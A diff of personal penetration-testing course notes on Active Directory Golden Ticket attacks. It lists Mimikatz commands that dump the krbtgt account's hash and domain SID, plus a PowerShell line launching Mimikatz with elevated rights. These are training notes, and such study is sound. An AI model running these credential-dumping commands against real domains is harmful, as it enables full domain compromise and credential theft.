ericktafel1/Main-Notes/🦊TCM Security/PEH/AD_4_Now What/2_Golden Ticket Attacks Overview.md

 - We can request access to any resource or system on the domain
 - Golden tickets == complete access to every machine

-We can utilize Mimikatz toobtain the information necessary to perform this attack
+We can utilize Mimikatz to obtain the information necessary to perform this attack

-`mimikatz.exe`​
+`mimikatz.exe`

 `privilege::debug`​

 `lsadump::lsa /inject /name:krbtgt`​

 - dumps the information for the krbtgt account
 - need:
 	- krbtgt ntlm hash
 	- domain SID
+Start-Process -FilePath "C:\Users\administrator\Downloads\mimikatz.exe" -Verb RunAs

 Results:
 ```